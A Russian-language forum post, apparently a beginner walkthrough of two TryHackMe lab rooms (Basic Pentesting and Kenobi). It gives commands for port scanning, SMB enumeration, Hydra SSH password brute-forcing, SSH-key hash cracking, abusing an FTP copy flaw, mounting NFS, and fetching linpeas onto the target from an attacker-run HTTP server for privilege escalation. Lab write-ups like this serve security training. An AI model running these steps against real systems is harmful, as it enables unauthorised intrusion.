• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

CTF Проходим лёгкие комнаты TryHackMe #2

G

guest-1675977874

Всем привет.В прошлой теме CTF - Проходим лёгкие комнаты TryHackMe я получил неплохую отдачу от вас и решил продолжить рассказывать про легкие комнаты THM.Я не буду расписывать моменты о которых уже говорил , буду стараться написать что-то уникальное , как минимум для меня:)
Давайте начнем с бесплатной комнаты , но довольно полезной , как по мне.
1671726098526.png

TryHackMe | Basic Pentesting << можете попробовать пройти ее вместе со мной
Первым делом запускаем nmap и сканируем порты
1671726278135.png

Мы можем заметить , что у нас есть SSH ( 22 порт ) , http (80) и еще какая-то дичь.Пока что не понятно...Поэтому запустим nmap с флагами -sV -sC
1671726520293.png

Как мы видим у нас установлен SMB.Воспользуемся утилитой enum4linux , чтобы выдернуть информацию.Команда: enum4linux -a айпи -G
1671726769886.png

Как мы видим у нас два юзера Kay и jan
Брутим гидрой пароль со словарем rockyou.txt.Команда: hydra -l jan -P rockyou.txt ssh://ip машины
получаем данные:
1671726856698.png

Дальше начинается самое интересное...
1671726956527.png

Да , можно конечно поковыряться в папках и найти у пользователя kay rsa ключ , получить хэш и сбрутить.Но что , если папок будет много , не будем же мы тратить много времени на поиск.Поэтому воспользуемся крутым скриптом linpeas.sh
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh
с помощью curl скачиваем скрипт и называем его linpeas
Дальше уже просто закидываем эту штуку на машину жертвы (jan)
scp linpeas.sh jan@IP_ADDRESS:/tmp
копируем скрипт на машину в tmp
1671727290436.png

Почему именно туда? Потому что в home недостаточно прав.
1671727642544.png

Видите.В etc например недостаточно прав , а в tmp успешно файл скопировался.
В чем разница scp от cp:
1671727725840.png

1671727989119.png

Запускаем скрипт и смотрим лог в терминале и думаем , как повышение прав сделать. Видим .ssh и id_rsa.Идем туда
Копируем id_rsa , заходим на нашу основную машину создаем файл любой с содержимым id_rsa и забираем хэш с помощью john/ssh2john.py at bleeding-jumbo · openwall/john
и получаем наш пароль:
1671730456622.png

Читаем файл и забираем флаг
1671731012602.png


Погнали к следующей машине!
1671734420203.png

Первым делом сканируем nmapом порты
1671734478723.png

nmap показал нам , что существует admin.html
1671734545528.png

В исходном коде ничего нет...
1671734813731.png

Читаем внимательно второе задание , там много полезной информации.Вводим в терминале nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse ip сайта
порт 445 на котором открыт SMB и скрипты для nmapa.
1671735002926.png

Как мы видим есть анонимный вход.Воспользуемся этим
smbclient //айпи сайта/anonymous
когда запросят пароль - жмем enter
1671734970959.png

давайте прочитаем log.Вводим в терминал get log.txt и файл скачивается на нашу машину
Отвечаем на вопросы на THM
1671736450336.png

1.3.5 ответ
Теперь нам надо перечислить количество эксплоитов
1671736627411.png

searchsploit нам поможет.Как мы видим для нашей версии 4 эксплоита.
По сути эта утилита тоже самое , что и сайт exploit db com , но только в командной строке
1671736744938.png

Если говорить вкратце , то эта уязвимость разрешает копировать файлы на нашу машину.Чем мы собственно и воспользуемся.
Соединяемся с ftp сервером по умолчанию 21 (nc IP сайта 21)
Успешно скопировали!
1671737910964.png

Создаем папку , куда мы запихнем наш скопированный файл mkdir /mnt/kenobiNFS
монтируем
mount айпи сайта:/var /mnt/kenobiNFS
проверяем содержимое
1671738259812.png

Теперь подключаемся по SSH.Даже пароль брутить не надо)
1671738384955.png

Забираем флаг
1671738421008.png

И так осталось последнее задание.Нужно повысить привилегии линукса , воспользуемся линписом , как и в прошлый раз.Давайте поднимем в этот раз сервер
sudo python3 -m http.server 80
Теперь на машине kenobi скачиваем нужный файл
wget http://наш_айпи/linpeas.sh
1671739214366.png

Делаем файл исполняемым
1671739255291.png

Можно запустить его вот так:
1671739343337.png

Там будет помечено красным /usr/bin/menu => будем повышать права
1671739693108.png

Делаем как на картинке и мы становимся rootом.Вопрос почему?Кто знает - пишите в комментариях.
1671739810081.png

Машина пройдена! Нравится ли вам мои статьи , продолжать ?!
 

Вложения

  • 1671727285329.png
    1671727285329.png
    6,3 КБ · Просмотры: 59
  • 1671734407052.png
    1671734407052.png
    46,6 КБ · Просмотры: 54
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!